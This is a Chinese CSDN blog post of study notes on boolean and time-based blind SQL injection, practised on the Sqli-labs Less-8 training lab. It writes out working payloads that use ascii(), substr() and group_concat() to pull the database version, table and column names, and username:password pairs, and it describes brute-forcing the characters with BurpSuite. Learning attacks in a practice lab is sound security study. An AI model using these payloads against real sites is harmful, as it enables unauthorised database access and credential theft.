[理论-学习]Web安全-SQL注入-基础07

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量81 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/119798557
版权
本文详细介绍了SQL注入中的布尔盲注和时间盲注技巧,通过Sqli-labs的Less8实验环境,展示了如何利用ascii()、substr()、sleep()和if()函数进行盲注。实验过程包括测试语句、获取数据库信息如版本号、用户名、数据表及字段,并演示了使用BurpSuite进行爆破的方法。
摘要由CSDN通过智能技术生成

声明:

由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。

笔记内容来源于各类网课。

环境:

以Sqli-labs中的less8为实验环境。 

一、盲注介绍

一般分为布尔盲注和延时(时间)盲注

布尔盲注利用的函数主要有ascii和substr

延时盲注利用的函数有if和sleep

布尔盲注适用于页面返回的状态只有两种。延时盲注适用于页面返回的状态没变化,我们需要通过请求返回的时间判断代码是否被执行。

1. ascii():用于将字符转为对应的ASCII码值。

2. substr():用于字符串切割,它的下标是从1开始。subst("123",2,1)返回字符"2"。

3. sleep():延时函数。sleep(2),执行后,系统等待2s。

4. if():if语句,用于判断,if(条件,条件真返回,条件假返回)。例如if(1,'2','3')返回字符‘2’。

二、实验(基于GET方式的字符串布尔盲注-单引号)

1. 使用GET方式传入参数

根据id值页面只有两种状态,返回空或者返回You are in....提示。

2. 测试语句能否报错

传入id=1“,没有报错,说明不是双引号闭合。

传入id=1',页面返回未空的状态,后台可能报错,但是不显示报错信息。

可以猜测后台是单引号闭合。至于有没有括号,我们继续测试。

3. 测试语句能否恶意执行(能不报错)

id=-1' or 1 %23

id为一个不存在的值(前面验证过了),依然可以登陆成功,说明我们的or 1成功执行了,也注释了后面的语句。所以肯定是单引号闭合,没有括号

select columns... from talbe_name where id='$id'

由于没有报错信息,不存在回显点,所以应采用盲注,这里采用布尔盲注最合适。

4. 获取版本号、当前用户名、当前数据名

首先依次测试语句能正确执行。

id=-1' or (select 1) %23

当这个语句可以执行,我们就能通过将select 1的位置替换为布尔值即可。

我们使用substr(version(),1,1),截取版本号字符串第一个字符。

再使用ascii(substr(version(),1,1)),将第一个字符转为ascii码。再通过判断(大于,小于,等于等),获取第一个字符的范围。

?id=-1' or (select (select ascii(substr(version(),1,1))) > 0  ) %23

这条语句结果肯定为真,version的字符串是数字,数字的ascii码肯定大于0。

我们通过大于,小于,等于来判断第一个字符是什么。使用二分法最快。

?id=-1' or (select (select ascii(substr(version(),1,1))) >52  ) %23
?id=-1' or (select (select ascii(substr(version(),1,1))) >53  ) %23
?id=-1' or (select (select ascii(substr(version(),1,1))) =53  ) %23

手工测试过于麻烦,我们使用BurpSuite进行爆破即可。

 由于版本字符串为数字和符号组成,我们选用相应的字典。

得到结果后,我们过滤,使用返回的字符串You are in...过滤成功的。 

 在按照Payload1排序,使用qq自带的截屏识别文字,将Payload2复制下来,转为ASCII码即可。

我们爆破用户名和数据库名略过。

5. 获取当前的表名,表中字段名

?id=-1' or 
(select 
(select ascii(substr( 
(select group_concat(table_name) from information_schema.tables
 where table_schema=database() ) ,1,1))) >0  ) %23

 

由于节省时间,字典我选择的只有字母。

?id=-1' or 
(select 
(select ascii(substr( 
(select group_concat(column_name) from information_schema.columns
 where table_schema=database() and table_name = 'users') ,1,1))) >0  ) %23

6. 获取当前的users表中的数据 

最后爆破users表中的用户名和密码。

?id=-1' or (select (select 
ascii(substr( 
(select group_concat(concat_ws(':',username,password)) 
from users),1,1)))>8 ) %23

这里只显示了部分,其他的可以继续爆破得到。

3hex___________
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全原理(1)——SQL注入
yuluotianjin的博客
09-01 585
1.Union注入 如果通过sql注入,页面上能获取预期信息,则可使用Union注入。 (1)判断是否存在注入点(区分下是数字型注入还是字符型注入) id=1 # 正常回值 id=1' # 异常回值 id=1 and 1=1 # 正常回值 id=1 and 1=2 # 异常回值 (2)判断表中的字段数 id=1 order by [1,2,3,……] 使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段
Web安全基础SQL注入原理与利用
Yuan's Blog
08-24 219
文章目录定义注入类型实现过程万能密码 定义 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 注入类型 Time-based blind SQL injection(基于时间延迟注入) UNION query SQL injection(可联合查询注入) Error-based SQL injection(报错型注入) Boolean-based blind SQL injection(布尔型注入) Stacked queries SQL inje
Web安全基础学习SQL注入漏洞之Mysql注入
qq_51862722的博客
06-18 956
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
Web安全基础学习SQL注入漏洞之PostgreSql注入
qq_51862722的博客
06-18 1215
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
Web安全基础学习SQL注入漏洞之Mssql注入
qq_51862722的博客
06-18 925
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
基于spring boot的校园商铺管理系统+源代码+演示视频.zip
09-03
信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古以来的短板,有效的提升管理的效率和业务水平。传统的管理模式,时间越久管理的内容越多,也需要更多的人来对数据进行整理,并且数据的汇总查询方面效率也是极其的低下,并且数据安全方面永远不会保证安全性能。结合数据内容管理的种种缺点,在互联网时代都可以得到有效的补充。结合先进的互联网技术,开发符合需求的软件,让数据内容管理不管是从录入的及时性,查看的及时性还是汇总分析的及时性,都能让正确率达到最高,管理更加的科学和便捷。本次开发的校园商铺管理系统实现了收货地址管理、购物车管理、字典管理、公告信息管理、商家管理、商品管理、商品收藏管理、商品评价管理、商品订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让校园商铺管理系统更能从理念走到现
notepad++ v8.5.7 win系统安装包
最新发布
09-03
最新版本的 Notepad++,并根据你的操作系统(Windows)下载适当的安装程序或便携版。最新的稳定版
14. 使用 OpenCV 和 Python 进行自动色彩校正(python代码,包括数据集)
09-03
我们发现了如何执行直方图匹配。使用直方图匹配,我们可以获取一张图像的颜色分布并将其与另一张图像匹配。 颜色匹配的实际应用是通过颜色恒定性执行基本颜色校正。 颜色恒定的目标是正确感知物体的颜色,而不管光源、照明等的差异如何(可以想象,这说起来容易做起来难)。 CV从业者可以通过使用颜色校正卡来帮助获得颜色恒定性,如下所示: 使用颜色校正/颜色恒定卡,我们可以: 检测输入图像中的颜色校正卡 计算卡片的直方图,其中包含不同颜色、色调、阴影、黑色、白色和灰色的渐变颜色 将颜色卡中的直方图匹配应用于另一个图像,从而尝试实现颜色恒定性
使用R语言实现CLARA算法对鸢尾花数据集进行大规模聚类分析
09-03
CLARA(Clustering Large Applications)是一个高效的聚类算法,专为处理大规模数据集而设计。它基于PAM(Partitioning Around Medoids)算法,通过抽样方法提高了计算效率,使得在数据量巨大的情况下也能快速进行聚类分析。本示例展示了如何使用R语言中的CLARA算法对标准化的鸢尾花数据集(Iris dataset)进行聚类分析。 CLARA算法的核心在于其对数据集的抽样策略。不同于传统的PAM算法,CLARA通过对原始数据集进行多次随机抽样来生成多个子集,并在这些子集上运行PAM算法来识别簇的中心。这样做的好处是显著减少了计算量,特别适合处理大规模数据集。在实际操作中,CLARA算法会运行多次抽样,每次抽样中,算法会选择一个样本子集进行聚类,并通过多次计算确定最终的簇中心。 在这个示例中,我们使用R语言的cluster包中的clara函数对标准化的鸢尾花数据进行聚类分析。选择了3个簇作为预期的簇数,因为鸢尾花数据集的实际品种数量为3。CLARA的抽样次数设置为50次,这样可以在大多数情况下提供可靠的聚类结果。......
山东科技大学软件工程专业Linux程序设计考试题目(含答案)
09-03
山东科技大学软件工程专业Linux程序设计考试题目(含答案) 1. 什么是 Linux 内核? 2. RedHat、CentOS 和 Fedora 三大 Linux 发行版之间有什么区别? 3. Linux 系统和 Windows 系统有什么本质区别? 4. /boot 分区,/ 分区,/swap 分区的作用分别是什么? 5. 如何查看当前操作系统的版本号和位数? 6. 如何对当前操作系统进行系统更新? 7. 如何通过官方仓库安装和卸载软件包? 8. 软件包安装和编译安装有什么区别? 9. 在 Linux 中,root 用户和普通用户有什么区别? 10. 如果忘记了系统 root 密码,如何重置 root 密码?描述其操作过程,可截图。 11. 将新添加的硬盘设备,分区、格式化并挂载到指定目录下,描述其操作过程,可截图。 12. 列举出三种查看 server.log 文件内容的指令语法。 13. 查看 tomcat/bin 目录下的 startup.sh 文件的前 10 行内容和后 10 行内容,如何操作?如果需要修改此文件内容,如何操作? 14. 删除 tomcat/logs/ 目录
(改写)_炫酷3D动态照片墙,网格+圆球+螺旋+阵列_cool-photo-wall.zip
09-03
(改写)_炫酷3D动态照片墙,网格+圆球+螺旋+阵列_cool-photo-wall
javaweb物流配货项目源码.rar
09-03
内容介绍 项目结构: Controller层:使用Spring MVC来处理用户请求,负责将请求分发到相应的业务逻辑层,并将数据传递给视图层进行展示。Controller层通常包含控制器类,这些类通过注解如@Controller、@RequestMapping等标记,负责处理HTTP请求并返回响应。 Service层:Spring的核心部分,用于处理业务逻辑。Service层通过接口和实现类的方式,将业务逻辑与具体的实现细节分离。常见的注解有@Service和@Transactional,后者用于管理事务。 DAO层:使用MyBatis来实现数据持久化,DAO层与数据库直接交互,执行CRUD操作。MyBatis通过XML映射文件或注解的方式,将SQL语句与Java对象绑定,实现高效的数据访问。 Spring整合: Spring核心配置:包括Spring的IOC容器配置,管理Service和DAO层的Bean。配置文件通常包括applicationContext.xml或采用Java配置类。 事务管理:通过Spring的声明式事务管理,简化了事务的处理,确保数据一致性和完整性。 Spring MVC整合: 视图解析器:配置Spring MVC的视图解析器,将逻辑视图名解析为具体的JSP或其他类型的视图。 拦截器:通过配置Spring MVC的拦截器,处理请求的预处理和后处理,常用于权限验证、日志记录等功能。 MyBatis整合: 数据源配置:配置数据库连接池(如Druid或C3P0),确保应用可以高效地访问数据库。 SQL映射文件:使用MyBatis的XML文件或注解配置,将SQL语句与Java对象映射,支持复杂的查询、插入、更新和删除操作。
基于Springboot的旅游管理系统+源代码+演示视频.zip
09-03
现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本旅游管理系统就是在这样的大环境下诞生,其可以帮助使用者在短时间内处理完毕庞大的数据信息,使用这种软件工具可以帮助管理人员提高事务处理效率,达到事半功倍的效果。此旅游管理系统利用当下成熟完善的Spring Boot框架,使用跨平台的可开发大型商业网站的Java语言,以及最受欢迎的RDBMS应用软件之一的MySQL数据库进行程序开发。旅游管理系统有管理员,用户两个角色。管理员功能有个人中心,用户管理,景点分类管理,景点信息管理,景点购票管理,酒店信息管理,酒店预定管理,游记分享管理,系统管理。用户可以注册登录,查看景点信息,并且可以进行景点购票操作和酒店预定操作,还可以发布游记分享。旅游管理系统的开发根据操作人员需要设计的界面简洁美观,在功能模块布局上跟同类型网站保持一致,程序在实现基本要求功能时,也为数据信息面临的安全问题提供了一些实用的解决方案。可以说该程序在帮助使用者高效率地处理工作事务的同时,也实现了数据信息的整体化,规范化与自动化。 关键词:旅游管理系统;S
【球类识别系统】图像识别Python+卷积神经网络算法+人工智能+深度学习+TensorFlow_ball_check.zip
09-03
【球类识别系统】图像识别Python+卷积神经网络算法+人工智能+深度学习+TensorFlow_ball_check
3、QC PXIe-7330 兆芯KX-U6780A零槽控制器
09-03
PXIe 7330系列是用于PXI Express系统的上海兆芯KX-6780A嵌入式控制器。包含2个10/100/1000/(千兆位)以太网端口、四个USB 3.0端口、以及一个集成硬盘驱动器、两个串行端口其他外设I/O。
Chrome 夜间模式插件dark-reader
09-03
最酷炫的夜间模式插件dark-reader,从此不再伤眼睛
【创新未发表】Matlab实现能量谷优化算法EVO-GRU实现风电数据预测算法研究.rar
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
使用R语言中的Fuzzy C-Means算法对iris数据集进行模糊聚类分析
09-03
在这项分析中,我们使用R语言对经典的iris数据集进行了模糊聚类分析,采用了Fuzzy C-Means(FCM)算法。Fuzzy C-Means是一种改进的聚类算法,允许每个数据点以不同的隶属度(概率)属于多个簇,而不仅仅是硬性分配到单个簇。这种方法特别适用于数据点之间界限不清晰的情况,通过计算每个数据点到各个簇中心的距离来确定其隶属度,从而生成更灵活的聚类结果。 在该分析中,我们首先从iris数据集中提取了四个数值变量——花萼长度、花萼宽度、花瓣长度和花瓣宽度。接着,我们加载了R中的cluster包,并使用其中的fanny函数执行Fuzzy C-Means聚类。我们设定了聚类数为3,这是因为iris数据集中的物种数为3个,虽然我们事先知道这些类别,但我们通过算法进行盲分类,以便验证其效果。 fanny函数的一个重要特点是其模糊指数参数(memb.exp),该参数决定了隶属度的模糊性。设置为较高的数值会使聚类结果更加模糊,即数据点可能较均匀地分布在多个簇中;而较低的数值则使得聚类结果更接近传统的硬聚类。
【中科院1区】Matlab实现花朵授粉优化算法FPA-SAE实现故障诊断算法研究.rar
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值